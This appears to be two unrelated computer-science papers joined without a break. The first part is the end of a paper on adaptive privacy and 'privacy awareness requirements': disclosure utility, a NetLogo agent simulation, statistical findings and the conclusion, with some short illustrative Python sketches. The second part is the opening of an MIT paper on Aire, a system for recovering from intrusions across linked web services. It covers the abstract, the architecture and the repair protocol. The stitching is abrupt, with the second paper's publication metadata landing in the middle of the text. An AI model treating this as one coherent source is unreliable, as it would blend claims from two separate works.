The clustering coefficient of \(a_3\), if the attribute \(x\) is sent to the receiver \(a_{R1}\), is 0.5; alternatively, the clustering coefficient if \(x\) is sent to \(a_{R2}\) is 0.3. Thus, using the clustering coefficient as a measure of benefit for the network in Figure 6, it is more beneficial for \(a_3\) to disclose \(x\) to \(a_{R1}\) than to \(a_{R2}\). The degree centrality of an agent describes the number of direct links that the agent has with other agents. Generally, it has been shown that an agent with higher degree centrality can gain access to and/or influence over others. Such agents can also serve as a source or conduit for larger volumes of information exchange with other agents [21]. Thus, a receiver with higher degree centrality stands a greater chance of disseminating inappropriately disclosed information to more agents, and hence represents a higher threat severity. Using the illustration in Figure 6, the degree centrality of \(a_{R1}\) is 0.25, hence it represents a lesser threat severity compared to \(a_{R2}\), whose degree centrality is 0.5. Given that a potential privacy threat is distinguished from a privacy threat that can be proven from the existing history, a damping factor is applied to the former. Such a factor ensures that a potential privacy threat does not have an equal measure of severity compared to a realised one. Overall, the utility of disclosure is then the difference between the benefit and the threat severity.
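The utility computation just described can be sketched directly. The damping value applied to potential (unproven) threats is an illustrative assumption, as the paper does not state a concrete factor:

```python
# Utility of disclosure = benefit - threat severity, where benefit is
# the clustering coefficient after disclosure and severity is the
# receiver's degree centrality. The damping factor 0.5 applied to
# potential (unproven) threats is an illustrative assumption.

def utility(benefit, severity, potential=False, damping=0.5):
    if potential:
        severity *= damping  # a potential threat weighs less
    return round(benefit - severity, 6)

# Figure 6 numbers: disclosing x to a_R1 versus a_R2.
print(utility(0.5, 0.25))  # 0.25
print(utility(0.3, 0.5))   # -0.2
```

A positive utility favours disclosure, a negative one favours withholding; damping lowers the effective severity of a merely potential threat.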
The utility of disclosure if \(a_3\) discloses the attribute \(x\) to \(a_{R1}\) is 0.25, while that for \(a_{R2}\) is -0.2. Thus, depending on the utility value, users or systems may consider disclosing or withholding specific information. In this manner, they either forfeit or reinforce their privacy when engaging in some interactions.

VI. EVALUATION OF PAR IN DISCLOSURE DECISION MAKING

We conducted an evaluation to demonstrate whether PAR can be a useful input to the planning phase of adaptive privacy. One way of evaluating this is to use specific adaptation strategies that regulate an acceptable utility, threat severity or benefit threshold for a subject. The effectiveness of these strategies can then be checked for scenarios where the failure or satisfaction of PAR is realised. Table 3 illustrates the set of strategies used in this study. Case1 represents an agent that does not satisfy PAR. For this case, an agent initiates privacy management without an understanding of threat severity, benefit or the ultimate utility of disclosure. Case2 represents an agent satisfying PAR and triggering the adaptation action that terminates all interactions with other agents once the utility reaches the value 0. At this point, for \(|H| > 0\), the privacy threat severity (\(TS\)) equals the benefit. Practically, Case2 represents an agent disassociating itself from a group objective because the benefit does not exceed the privacy threat resulting from information disclosure. For Case3, the agent satisfies PAR and triggers an adaptation action similar to Case2 once \(TS\) is greater than a specific threshold (\(Th\)). Practically, Case3 represents an agent disassociating itself from a group objective irrespective of the benefit derived, because a specific threat severity level has been reached. Finally, Case4 is similar to Case3, but the adaptation action triggered is not to disclose information to other agents with specific properties.
For this evaluation, the property we examine is the number of neighbours ($n$) of the receiving agent. Practically, Case4 is a strategy that does not stop the increase in threat severity, but curbs the rate at which the increase occurs, while still deriving some utility. Based on the four highlighted cases, we conduct an experimental study that evaluates the following research questions. RQ1: What is the difference between an agent that does not satisfy PAR (i.e. No-PAR) and an agent that does (i.e. with PAR)? To address this question, we consider Case1 (No-PAR) and Case2 (with PAR). RQ2: Is there any advantage that Case3 has over Case4, or vice-versa? Considering that Case3 and Case4 manipulate varying $Th$ and $n$ values respectively, the aim is to understand the impact of these variations on utility. Finally, RQ3 investigates the impact that the number of agents in a group has on the utilities of Case3 and Case4.

A. Experimental Setup

In this evaluation we used NetLogo [23] (a programmable modelling environment for simulating natural and social phenomena) to simulate interactions across nine groups of agents. The number of agents in each group ranged from 10 to 250. This choice was inspired by studies on the average number of links that an agent has with other agents in typical group networks where agents are human [25]. The behaviour of each agent is a variant of the behavioural model shown in Figure 3. During the simulation, multiple interactions can occur over a single link; thus, the actual number of links is smaller than the total number of simulated interactions. Each group had a single subject with multiple senders and receivers. Thus, every interaction either involved the subject sending information about itself, or another agent sending information about the subject. Also, the simulation of interactions followed the power-law distribution, which is typical in group networks where a small number of agents have a very large number of links.
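The power-law interaction pattern described above can be approximated with Zipf-like weights. The sketch below is a stdlib stand-in for the NetLogo setup, shown only to make the sampling idea concrete; the exponent, seed, and function names are our assumptions, not part of the original study.

```python
import random

def zipf_weights(num_agents, exponent=1.0):
    """Agent i receives weight 1/(i+1)^exponent, so a few agents
    attract most interactions, as in a power-law group network."""
    return [1.0 / (i + 1) ** exponent for i in range(num_agents)]

def simulate_interactions(num_agents, num_interactions,
                          exponent=1.0, seed=42):
    """Pick a receiving agent for each interaction; multiple interactions
    may reuse the same link, so distinct links <= total interactions."""
    rng = random.Random(seed)
    weights = zipf_weights(num_agents, exponent)
    receivers = rng.choices(range(num_agents), weights=weights,
                            k=num_interactions)
    links = set(receivers)  # distinct subject-receiver links
    return receivers, links
```

Because `random.choices` samples with replacement, the number of distinct links is bounded by the number of interactions, matching the observation that multiple interactions occur over a single link.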
Our simulation of interactions and the resulting networks was tailored to closely resemble mobility-based networks, where links arise mainly from the spatial or temporal proximity of agents. For each group, we associated $PR_i$ (Section IV.C) with the selected subject. We assumed a conservative scenario where every interaction resulted in a privacy threat. Furthermore, we fixed $Th = 0.12$, and evaluated Case3 for $Th$, $Th*2$, $Th*4$, $Th*6$, $Th*8$ and $Th*10$ respectively. Similarly, we fixed $n = 8$, and evaluated Case4 for $n$, $n+2$, $n+4$, $n+6$, $n+8$ and $n+10$ respectively.

B. Findings and Lessons Learned

The topology metrics for each group network based on the above experimental setup are shown in Table 4. $TS_{no-PAR}$ refers to the privacy threat severity where PAR are not satisfied. The 2nd and 3rd columns show that the number of links between agents increases with the number of agents in a group. Similarly, the number of interactions required for the privacy threat severity to reach 1 in a scenario where PAR are not satisfied increases with the number of agents. This is because, given the power-law distribution, increasing the number of agents in a group decreases the degree centrality of most receiving agents, and hence the associated privacy threat severity. In the remainder of this subsection we use these results to address each of the designated research questions. While the results generated for the different groups were related, due to space limitations we show results only for group 7 in RQ1 and RQ2. In RQ3, we then demonstrate the impact of the number of agents in a group on the effectiveness of adaptation actions.

Table 4 Simulated network topology metrics

<table> <thead> <tr> <th>Group</th> <th>No. agents</th> <th>No. links</th> <th>No. interactions ($TS_{no-PAR} = 1$)</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>10</td> <td>29</td> <td>58</td> </tr> <tr> <td>2</td> <td>25</td> <td>104</td> <td>238</td> </tr> <tr> <td>3</td> <td>50</td> <td>282</td> <td>697</td> </tr> <tr> <td>4</td> <td>75</td> <td>521</td> <td>1339</td> </tr> <tr> <td>5</td> <td>100</td> <td>788</td> <td>2065</td> </tr> <tr> <td>6</td> <td>125</td> <td>1095</td> <td>2911</td> </tr> <tr> <td>7</td> <td>150</td> <td>1441</td> <td>3874</td> </tr> <tr> <td>8</td> <td>200</td> <td>2189</td> <td>5968</td> </tr> <tr> <td>9</td> <td>250</td> <td>3170</td> <td>8611</td> </tr> </tbody> </table>

1) RQ1 findings: Figure 7 shows the plots of threat severity, benefit and utility for Case1 and Case2 for a subject in Group 7. In both cases, it can be seen that the benefit of information disclosure reaches a tipping point and gradually decreases thereafter. This outcome is explained by considering that the more a subject engages in interactions and forms new links with other agents, the less likely it is that the neighbours of the subject will have links to each other. This results in a lower benefit measure. In contrast, given No-PAR for Case1, the threat severity continues to increase, with a continuous decrease in the utility. This continuous increase in severity results from the receiving agent having more neighbours as interactions increase. For Case2 with PAR, as shown in Figure 7, the subject is able to curb the continuous increase in threat severity. In summary, the core distinction between an agent with PAR and one with No-PAR is that agents with PAR can regulate information disclosure. Such regulation is based on tolerable levels of threat severity or on the minimum expected utility. For Case2, this is achieved by terminating all subsequent interactions at the point where utility reaches 0.
However, terminating all subsequent interactions can be viewed as an extreme risk-averting behaviour which can hinder agents from reaping the benefit of disclosure. Thus, a more appropriate scenario falls somewhere between the extreme cases of risk-taking and risk-averting. We investigate these scenarios in RQ2 with varying values of $Th$ and $n$.

2) RQ2 findings: Figure 8 illustrates the impact of a subject terminating information disclosure to receiving agents with $n$ neighbours in a group (Case4). It is noticeable here that increasing $n$ results in the utility tending towards what we observed in the No-PAR case. Again, this outcome can be explained by the assumed power-law distribution, where only a small number of receiving agents have a high $n$. Thus, at higher $n$ values this adaptation action is less effective. The outcome for Case3, involving a different adaptation action, is depicted in Figure 9. Here, all interactions are terminated when $TS$ exceeds a specified $Th$. For this case, the subject does not need to wait until utility = 0. As a result, the utility curves associated with the two lower thresholds ($Th_1$ and $Th_2$) outperform the utility of Case2. Similar to Case4, as $Th$ values increase, the utility for the subject tends towards the No-PAR utility.

To achieve a better understanding of the statistical significance of the results generated for varying $Th$ and $n$ values, we ran a non-parametric ANOVA test. The choice of non-parametric ANOVA was made because the utility data of the different cases did not follow a normal distribution. Figure 10 shows the box plots for the utility functions of Case1-Case4. The Kruskal-Wallis test showed a significant difference between these cases, but pair-wise comparison revealed that the three higher $Th$ values for Case3 (i.e., $Th_4$, $Th_5$ and $Th_6$) are not statistically different from No-PAR or from each other. Conversely, $Th_1$, $Th_2$ and $Th_3$ are statistically different from No-PAR and from each other.
This outcome suggests that for a risk-averting behaviour, $Th_1$ is better than $Th_2$ and $Th_3$. Conversely, for a risk-taking behaviour, $Th_3$ is the limit (compared to $Th_4$, $Th_5$ and $Th_6$) which, if applied, still allows some benefit to be derived without being similar to No-PAR.

Figure 8: Utility of terminating disclosure to agents with different numbers of links ($n$); agents = 150.

Again, the two higher $n$ values for Case4 (i.e., $n_5$ and $n_6$) are not significantly different from No-PAR or from each other. Conversely, $n_1$-$n_4$ are statistically different from No-PAR as well as from each other. This outcome suggests that for a risk-averting behaviour, $n_1$ is better than $n_2$-$n_4$. Conversely, for a risk-taking behaviour, $n_4$ is the limit (compared to $n_5$ and $n_6$) which, if applied, still allows some benefit to be derived without reaching the No-PAR utility.

In summary, for a risk-averting behaviour, it can be said that lower values of $Th$ or $n$ are better than higher values. In contrast, for a risk-taking behaviour, the incentive is for a subject to accommodate the decline in utility and the increase in threat severity in order to leverage the benefit. However, there is a limit to which such a subject can risk information disclosure, beyond which it is as good as the subject not satisfying PAR.

3) RQ3 findings: Table 5 shows a comparison of Case3 and Case4 against No-PAR for the different groups considered in this study. This table illustrates that for groups 1, 2 and 3, consisting of 10, 25 and 50 agents respectively, none of the adaptation actions in Case4 was significantly different from No-PAR. From groups 4 to 9, the outcome showed a different trend, with a decreasing number of $n$ values that were not significantly different from the No-PAR case.
The rationale for this outcome is derived from the view that, for a specific $n$ value, as the number of agents in a group increases there is also an increased likelihood that a receiving agent has more than $n$ neighbours. Conversely, for a smaller group of agents (groups 1, 2 and 3), smaller values of $n$ are required to achieve a statistically different utility. A pattern similar to Case4 is also roughly observable for Case3, which involves varying $Th$ values across groups. As such, for groups with a smaller number of agents, smaller values of $Th$ are required to achieve a statistically different utility. The key observation is that $n$ and $Th$ are mutable factors that change depending on the number of agents in the group. As the number of agents in a group increases, the resulting utility of an adaptation action for a specific $n$ and $Th$ also becomes more significantly different from No-PAR.

VII. CONCLUSION AND FURTHER WORK

In this paper, we presented an adaptive privacy framework that enables the runtime selective disclosure of personal information. Our approach is based on the rationale that, for the appropriate disclosure of information from a sender to a receiver, some privacy awareness requirements (PAR) need to be satisfied. Such requirements underpin the ability of applications to identify the attributes to monitor in order to detect privacy threats, the discovery of a privacy threat before information is disclosed, and an understanding of the utility of disclosure, which includes the severity of the threat as well as the benefit of disclosure in the face of the discovered threat. We evaluated our framework from two viewpoints. First, we showed that applications that fail to satisfy PAR are unable to regulate information flow based on the utility of disclosure. Secondly, we showed that applications that satisfy PAR can regulate the disclosure of information.
We demonstrated the usefulness of PAR across a spectrum where, at one end, is risk-aversion (with the aim of user applications minimising exposure to privacy threats) and, at the other end, is risk-taking (with the objective of maximising benefit amidst increasing threat severity and declining utility). Although we used a single motivating example to evaluate our approach, we suggest that it is generalisable to other domains where disclosure can be modelled as the transfer of information between agents.

The key benefit of our approach to engineering adaptive software is that PAR can serve as useful input into the planning and execution phases of the adaptation cycle. PAR are useful for planning as they provide an understanding of the utility of information disclosure. We also expect PAR to be useful for execution, because they provide a rationale for the software models that need to change in order to preserve privacy. While we have not focused on the semantics of such change, we expect it to involve an adaptation manager carrying out some actions. These include altering or removing disclosure behaviour by updating the LTS representation of the application. Other execution approaches may include refining user privacy requirements, or learning new inference rules in the context model to subsequently enable better adaptation. Another benefit of our approach to software engineering is that it relies on a minimal subset of general software engineering models. For example, there is no need to explicitly model a malicious user in order to discover privacy threats.

The interaction networks generated in the evaluation of our approach closely resemble random networks that are typical of mobile applications. Further work will be required to generalise our approach to other forms of networks, such as small-world networks or networks where the power-law distribution is not assumed. Furthermore, our framework is extensible to utilise richer models of context.
Thus, we aim to investigate other models that address possible uncertainties introduced by mobility and changing context. The wider question that our framework poses is that of engineering an existing legacy application into an adaptive, privacy-protecting one. In future work, we plan to investigate an aspect-oriented and component-based approach to adaptive privacy that is amenable to legacy systems. Finally, we intend to investigate the notion of entropy and transience in adaptive privacy. This is necessary because the sensitivity of information may decay over time for a number of reasons. These include the transient nature of the knowledge of human agents, and the disclosed information becoming out of context or less accessible over time.

ACKNOWLEDGMENT

This work was supported, in part, by SFI grant 10/CE/I1855 (for CSET2) to Lero, a Microsoft SEIF Award (2011) and the European Research Council.
Asynchronous intrusion recovery for interconnected web services

<table> <tbody> <tr> <td>As Published</td> <td><a href="http://dx.doi.org/10.1145/2517349.2522725">http://dx.doi.org/10.1145/2517349.2522725</a></td> </tr> <tr> <td>Publisher</td> <td>Association for Computing Machinery</td> </tr> <tr> <td>Version</td> <td>Author’s final manuscript</td> </tr> <tr> <td>Citable Link</td> <td><a href="http://hdl.handle.net/1721.1/91473">http://hdl.handle.net/1721.1/91473</a></td> </tr> <tr> <td>Terms of Use</td> <td>Creative Commons Attribution-Noncommercial-Share Alike</td> </tr> <tr> <td>Detailed Terms</td> <td><a href="http://creativecommons.org/licenses/by-nc-sa/4.0/">http://creativecommons.org/licenses/by-nc-sa/4.0/</a></td> </tr> </tbody> </table>

Asynchronous intrusion recovery for interconnected web services

Ramesh Chandra, Taesoo Kim, and Nickolai Zeldovich

MIT CSAIL

Abstract

Recovering from attacks in an interconnected system is difficult, because an adversary that gains access to one part of the system may propagate to many others, and tracking down and recovering from such an attack requires significant manual effort. Web services are an important example of an interconnected system, as they are increasingly using protocols such as OAuth and REST APIs to integrate with one another. This paper presents Aire, an intrusion recovery system for such web services. Aire addresses several challenges, such as propagating repair across services when some servers may be unavailable, and providing appropriate consistency guarantees when not all servers have been repaired yet.
Experimental results show that Aire can recover from four realistic attacks, including one modeled after a recent Facebook OAuth vulnerability; that porting existing applications to Aire requires little effort; and that Aire imposes a 19–30% CPU overhead and 6–9 KB/request storage cost for Askbot, an existing web application. 1 Introduction In an interconnected system, such as today’s web services, attacks that compromise one component may be able to spread to other parts of the system, making it difficult to recover from an intrusion. For example, consider a small company that relies on a customer management web service (such as Salesforce) and an employee management web service (such as Workday) to conduct business, and uses a centralized access control web service to manage permissions across all of its services. The servers of these web services interact with each other on the company’s behalf, to synchronize permissions, update customer records, and so on. If an attacker exploits a bug in the access control service, she could give herself write access to the employee management service, use these new-found privileges to make unauthorized changes to employee data, and corrupt other services. Manually recovering from such an intrusion requires significant effort to track down what services were affected by the attack and what changes were made by the attacker. Many web services interact with one another using protocols such as OAuth [3], REST, or other APIs [12, 14, 22, 23], and several recent vulnerabilities in real web services [9–11, 13, 20] could be used to launch attacks like the one just described. For example, a recent Facebook OAuth vulnerability [9] allowed an attacker to obtain a fully privileged OAuth token for any user, as long as the user mistakenly followed a link supplied by the attacker; the attacker could have used this token to corrupt the user’s Facebook data. 
If other applications accessed that user’s data on Facebook, the attack would have spread even further. So far, we do not know of serious attacks that have exploited such vulnerabilities, perhaps because interconnected web services are relatively new. However, we believe that it is only a matter of time until attacks on interconnected web services emerge. This paper takes the first steps toward automating recovery from such attacks. We identify the challenges that must be addressed to make recovery practical, and present the design and implementation of Aire, a system for recovering from intrusions in a large class of loosely coupled web services, such as Facebook, Google Docs, Dropbox, and Amazon S3. Aire works as follows. Each web service that wishes to support recovery runs Aire on its servers. During normal operation, Aire logs information about the service’s execution, as well as requests received from and sent to other services, thus tracking dependencies across services. When an administrator of a service learns of a compromise, he invokes Aire on the service, and asks Aire to cancel the attacker’s request. Aire repairs the local state of the service using selective re-execution [7, 15], and propagates repair to other web services that may have been affected, so they can recover in turn, until all affected services are repaired. In addition to recovering from attacks, Aire can similarly help recover from user or administrator mistakes. Aire’s contribution over past work [7, 16] is in addressing three main challenges faced by intrusion recovery across web services: **Decentralized, asynchronous repair (§3).** One possible design for a recovery system is to have a central repair coordinator that repairs all the services affected by an attack. However, this raises two issues. First, web services do not have a strict hierarchy of trust and so there is no single system that can be trusted to orchestrate repair across multiple services. 
Second, during repair, some services affected by an attack may be down, unreachable, or otherwise unavailable. Waiting for all services to be online in order to perform repair would be impractical and might unnecessarily delay recovery in services that are already online. Worse yet, an adversary might purposely add her own server to the list of services affected by an attack, in order to prevent timely recovery. Aire solves these issues with two ideas. First, to avoid services having to trust a central repair coordinator, Aire performs decentralized repair: Aire defines a repair protocol that allows services to invoke repair on their past requests to other services, as well as their past responses to requests from other services. Second, to repair services after an intrusion without waiting for unavailable services, Aire performs asynchronous repair: a service repairs its local state as soon as it is asked to perform a repair, and if any past requests or responses are affected, it queues a repair message for other services, which can be processed when those services become available. While Aire’s repair infrastructure takes care of many issues raised by intrusion recovery, there are two remaining challenges that require application-specific changes to support repair: **Repair access control (§4).** Repair operations themselves can be a security vulnerability, and an application must ensure that Aire’s repair protocol does not give attackers new ways to subvert a web service. To this end, Aire provides an interface for applications to specify access control policies for every repair invocation. **Reasoning about partially repaired states (§5).** With Aire’s asynchronous repair, some services affected by an attack could be already repaired, while others might not have received or processed their repair messages yet. Such a partially repaired state could appear inconsistent to clients or other services, and lead to unexpected application behavior. 
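The asynchronous propagation described above can be pictured as a per-service outbox that is flushed when a destination becomes reachable. The sketch below is hypothetical (class and method names are ours, not Aire's) and abstracts the transport behind an injected `send` callable, so a failed delivery simply leaves the message queued for a later retry.

```python
from collections import defaultdict, deque

class RepairPropagator:
    """Queue repair messages per destination service and deliver them
    in order once the service is reachable. All names are illustrative;
    the real system layers repair messages on top of HTTP."""

    def __init__(self, send):
        self.send = send                   # send(service, message) -> bool
        self.pending = defaultdict(deque)  # service -> queued messages

    def propagate(self, service, message):
        """Record a repair message and attempt immediate delivery."""
        self.pending[service].append(message)
        self.flush(service)

    def flush(self, service):
        """Deliver queued messages in order; stop at the first failure
        (service down or unreachable) and retry on the next flush."""
        q = self.pending[service]
        while q:
            if not self.send(service, q[0]):
                break
            q.popleft()

    def on_service_available(self, service):
        """Called when a previously unavailable service comes back."""
        self.flush(service)
```

Because each destination has its own queue, an unavailable (or adversarial) service only delays its own repairs; already-online services repair their local state without waiting.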
To help developers handle partially repaired states in their applications, we propose the following contract: repair should be indistinguishable from concurrent requests issued by some client on the present state of the system. This contract largely reduces the problem of dealing with partially repaired states to the existing problem of dealing with concurrent clients, which many web application developers already have to reason about. To evaluate Aire’s design, we implemented a prototype of Aire for Django-based web applications. We ported three existing web applications to Aire: an open-source clone of StackOverflow called Askbot [1], a Pastebin-like application called Dpaste, and a Django-based OAuth service. We also developed our own shared spreadsheet application. In all cases, Aire required minimal changes to the application source code. As there are no known attacks that propagate through interconnected web services in the wild, we construct four realistic intrusions that involve the above web applications, including a scenario inspired by the recent Facebook OAuth vulnerability, and demonstrate that Aire can recover from them. We also show that Aire can recover a subset of services from attack even when others are unavailable. Porting an application to Aire required changing under 100 lines of server-side code for the applications mentioned above. Supporting partial repair can require changing the API of a service; the most common example that we found is adding branches to a versioning API. Finally, we show that Aire’s performance costs are moderate, amounting to a 19–30% CPU overhead and 6–9 KB/request storage cost in the case of Askbot.

2 Overview

Aire’s goal is to undo the effects of an unwanted operation (specified by some user or administrator) that propagated through Aire-enabled services, which means producing a state that is consistent with the attack never having taken place.
Aire expects that the user or administrator will pinpoint the unwanted operation (e.g., the initial intrusion into the system) to initiate recovery. In practice, the user or administrator will probably use some combination of auditing, intrusion detection, and analysis [17, 18] to find the initial intrusion point. Aire assumes that each service exposes an API which defines a set of operations that can be performed on it, and that services and clients interact only via these operations; they cannot directly access each other’s internal state. This model is commonplace in today’s web services, such as Amazon S3, Facebook, Google Docs, and Dropbox. Under this model, an attack is an API operation that exploits a vulnerability or misconfiguration in a service and causes undesirable changes to the service’s state. These state changes can propagate to other services, either as a result of this service invoking operations on other services or vice-versa. Aire aims to undo both the initial changes to the service state, as well as any changes propagated to other services. On each individual service, Aire repairs the local state in a manner similar to the Warp intrusion recovery system [7], by rolling back the database state affected by the attack and re-executing past requests to the service that were affected by the attack. If during local repair Aire determines that requests or responses to other services might have been affected, Aire asynchronously sends repair messages to those services. Each repair message specifies which request or response was affected by repair, and includes a corrected version of the request or response. When a service receives a repair message, Aire initiates local recovery, after checking permissions for the repair message. Once repair messages propagate to all affected services, the attack’s effects will be removed from the entire system.
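The rollback-and-re-execute idea can be sketched in miniature. In the hypothetical model below, a repair log maps each request ID (ordered by original execution) to the rows it read and wrote, an `undo` map of pre-request row values, and a `redo` callable; the flat-dict database and these names are heavy simplifications of the versioned database and request logs that Warp and Aire actually maintain.

```python
def find_affected(log, attack_id):
    """Transitively collect requests tainted by the attack: a request is
    affected if it read or wrote a row that an affected request wrote."""
    tainted = set(log[attack_id]["wrote"])
    affected = {attack_id}
    changed = True
    while changed:
        changed = False
        for rid, entry in log.items():
            if rid in affected:
                continue
            if (entry["read"] | entry["wrote"]) & tainted:
                affected.add(rid)
                tainted |= entry["wrote"]
                changed = True
    return affected

def local_repair(log, db, attack_id):
    """Roll back tainted rows to their earliest pre-request values, then
    re-execute the affected requests in original order, skipping the
    attack request so that its effects disappear."""
    affected = find_affected(log, attack_id)
    rolled = set()
    for rid in sorted(affected):               # original execution order
        for row, pre_value in log[rid]["undo"].items():
            if row not in rolled:              # earliest version wins
                db[row] = pre_value
                rolled.add(row)
    for rid in sorted(affected):
        if rid != attack_id:                   # skip the attack request
            log[rid]["redo"](db)
    return affected
```

Re-executing an affected request may taint further rows; the fixed-point loop in `find_affected` mirrors the repeated application of the rollback-redo algorithm to indirectly affected requests.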
However, even before repair messages propagate everywhere, applications that are already online can repair their local state. With API-level repair, Aire can recover from attacks that exploit misconfigurations of a service or vulnerabilities in a service’s code, and from accidental user mistakes. This includes several scenarios, such as the ones described in §1, but does not include attacks on the OS kernel or the Aire runtime itself. In the rest of this section we review Warp and present Aire’s system architecture and assumptions. 2.1 Review of Warp Aire’s recovery of a service’s local state is inspired by Warp [7]. This section provides a brief summary of Warp’s design, and its rollback-redo approach to recovery, as it relates to Aire. Much as in Aire, an administrator of a Warp system initiates recovery by specifying an attack request to undo. During normal execution of a web application, Warp builds up a repair log that will be used to recover from attacks. In particular, Warp records HTTP requests and their responses, and database queries issued by each request and their results. Warp also maintains a versioned database that stores all updates to every database row. Given the above recorded information, Warp recovers from an attack as follows. First, Warp rolls back the database rows modified by the attack request to the request’s original execution time. Second, Warp uses its logs to identify database queries that might have read the rows affected by the attack, or queries that might have modified the rows that have been rolled back, and re-executes the corresponding requests (except for the attack request, which is skipped). For each re-executed request, Warp rolls back the database rows accessed by that request to the time of the request’s original execution, and applies the same algorithm to find other requests that might have been indirectly affected. 
This algorithm finishes after it has re-executed all requests affected by the attack, thereby reverting all of the attack’s effects. Figure 1: Overview of Aire’s design. Components introduced or modified by Aire are shaded. Circles indicate places where Aire intercepts requests from the original web service. Not shown are the detailed components for services B and C. 2.2 Aire architecture Figure 1 provides an overview of Aire’s overall design. Every web service that supports repair through Aire runs an Aire repair controller, whose design is inspired by Warp [7]. The repair controller maintains a repair log during normal operation by intercepting the original service’s requests, responses, and database accesses. The repair controller also performs repair operations as requested by users, administrators, or other web services, by rolling back affected state and re-executing affected requests. In order to be able to repair interactions between services, Aire intercepts all HTTP requests and responses to and from the local system. Repairing requests or responses later on requires being able to name them; to this end, Aire assigns an identifier to every request and response, and includes that identifier in an HTTP header. The remote system, if it is running Aire, records this identifier for future use if it needs to repair the corresponding request or response. During repair, if Aire determines that the local system sent an incorrect request or response to another service, it computes the correct request or response, and sends it along with the corresponding ID to the other service. Aire’s repair messages are implemented as just another API on top of HTTP (with one special case, when a server needs to get in touch with a past client). Aire supports four kinds of operations in its repair API. The two most common repair operations involve replacing either a request or response with a different payload. 
Two other operations arise when Aire determines that the local service should never have issued a request in the first place, or that it should have issued a request while none was originally performed; in these cases, Aire asks the remote service to either cancel a past request altogether, or to create a new request. To perform repair, Aire makes several assumptions. First, Aire assumes that each service’s web software stack is in the trusted computing base. This includes the OS, the language runtime, the database server, and the application framework (such as Rails or Django) that the service operates on. Aire cannot recover from an attack that compromises these system components. Second, Aire’s repair propagation assumes that the services and clients affected by an attack are running Aire. If some client or service does not run Aire, then Aire will not be able to repair the effects of the attack on that client or service (and any other clients and services to which the attack spread from there). If a service cannot propagate repair to another machine, Aire notifies the service’s administrator of the repair that cannot be propagated, so that the administrator can take remedial action (e.g., manual recovery). As a corollary, Aire assumes that attacks do not propagate through Web browsers, as our current Aire prototype does not support browser clients, and hence cannot track or repair from attacks that spread through users’ browsers. It may be possible to add repair for browsers in a manner similar to Warp’s shadow browser [7]. Finally, Aire assumes that each service has an appropriate access control policy that denies access to unauthorized clients requesting repair, and that each service and its clients support partially repaired states. If the former assumption does not hold, attackers would be able to use repair to make unauthorized changes to a service. If the latter assumption is broken, clients may behave incorrectly due to inconsistencies between services. 
### 3 Distributed repair The next three sections delve into the details of Aire’s design. This section describes Aire’s asynchronous repair protocol, §4 focuses on permission checking for repair messages between services, and §5 discusses how applications can handle partially repaired states that arise during asynchronous repair. #### 3.1 Repair protocol Each Aire-enabled web service exports a repair interface that its clients (including other Aire-enabled web services) can use to initiate repair on it. Aire’s repair interface is summarized in Table 1. Aire’s repair begins when some client (either a user or administrator, or another web service) determines that there was a problem with a past request, or that it incorrectly missed issuing a past request. The client initiates repair on the corresponding service by using the `replace` or `delete` operations to fix the past request, or by using the `create` operation to create a new request in the past. Sometimes, a past response of a service is incorrect, in which case the service initiates repair on the corresponding client using the `replace_response` operation. We now describe these operations in more detail. <table> <thead> <tr> <th>Command and parameters</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>replace (request_id, new_request)</td> <td>Replaces past request with new data</td> </tr> <tr> <td>delete (request_id)</td> <td>Deletes past request</td> </tr> <tr> <td>create (request_data, before_id, after_id)</td> <td>Executes new request in the past</td> </tr> <tr> <td>replace_response (response_id, new_response)</td> <td>Replaces past response with new data</td> </tr> </tbody> </table> **Table 1:** The repair protocol between Aire servers. When repairing a request, Aire updates its repair log and versioned database, just like it does during normal operation, so that a future repair can perform recovery on an already repaired request. 
This is important because asynchronous repair can cause a request to be repaired several times as repair propagates through all the affected services. Aire must control who can issue repair operations, to ensure that clients or other web services cannot make unauthorized changes via the repair interface. Aire delegates this access control decision to the original service, as access control policies can be service-specific: for example, a service might require a stronger form of authentication (e.g., Google’s two-step authentication) when a client issues a repair operation than when it issues a normal operation; or a platform such as Facebook might block repair requests from a third-party application if the application is attempting to modify the profile of a user that has since uninstalled that application. In some cases, appropriate credentials for issuing a repair operation on another web service may be unavailable. For example, Aire on a service A may need to repair a request it previously issued on behalf of a specific user to a remote service B; however, if A no longer has the user’s credentials to B, it cannot invoke repair on B. Aire treats this situation as if service B is not available, and queues the repair on A for later. Once the user logs in to A and provides credentials for B, A can use the user’s credentials to propagate repair.

Repairing requests. The replace operation supplies, in new_request, a corrected version of the past request named by request_id, encoded in the same way as the arguments originally provided to the original request, including the URL, HTTP headers, query parameters, etc. When Aire’s controller performs a replace operation, it repairs the local state to be as if the newly supplied request happened instead of the original request. If other requests or responses turn out to be affected by this repair, Aire queues appropriate repair API calls for other services. The delete operation is similar to replace, but it is used when a client determines that it should not have issued some request at all. In this case, delete instructs the Aire repair controller to eliminate all side-effects of the request named by request_id.

Creating new requests. Sometimes, repair requires adding a new request “in the past.” For example, if an administrator forgot to remove a user from an access control list when he should have been removed, one way to recover from this mistake is to add a new request at the right time in the past to remove the user from the access control list. The create call allows for this scenario. One challenge with create is in specifying the time at which the request should execute. Different web services do not share a global timeline, so the client cannot specify a single timestamp that is meaningful to both the client and the service. Instead, the client specifies the time for the newly created request relative to other messages it exchanged with the service in the past.
To do this, the client first identifies the local timestamp at which it wishes the created request to execute; then it identifies its last request before this timestamp and the first request after this timestamp that it exchanged with the service, and instructs the service to run the created request at a time between these two requests. The before_id and after_id parameters to the create call name these two requests. The above scheme is not complete: it allows the client to specify the order of the new request with respect to past requests the client exchanged with the service executing the new request, but it does not allow the client to specify ordering with respect to arbitrary messages in the system. More general ordering constraints would require services to exchange large vector timestamps or dependency chains, which could be costly. As we have not yet found a need for it, we have not incorporated it into Aire’s design. Repairing responses. The replace_response operation allows a server to indicate that a past response to a client, named by its response_id, was incorrect, and to supply a corrected version of the response in new_response. In web services, clients initiate communication to the server. However, to invoke a replace_response on a client, the service needs to initiate communication to the client. This raises two issues. First, the server needs to know where to send the replace_response call for a client. To address this issue, Aire associates a notifier URL with each request; if the server wants to contact the client to repair the response, it sends a request to the associated notifier URL. Second, once a client gets a replace_response call from a service, it needs to authenticate the service. During normal operation, as the client initiates communication, it typically authenticates the server by communicating with it over TLS (which verifies the server’s X.509 certificate). 
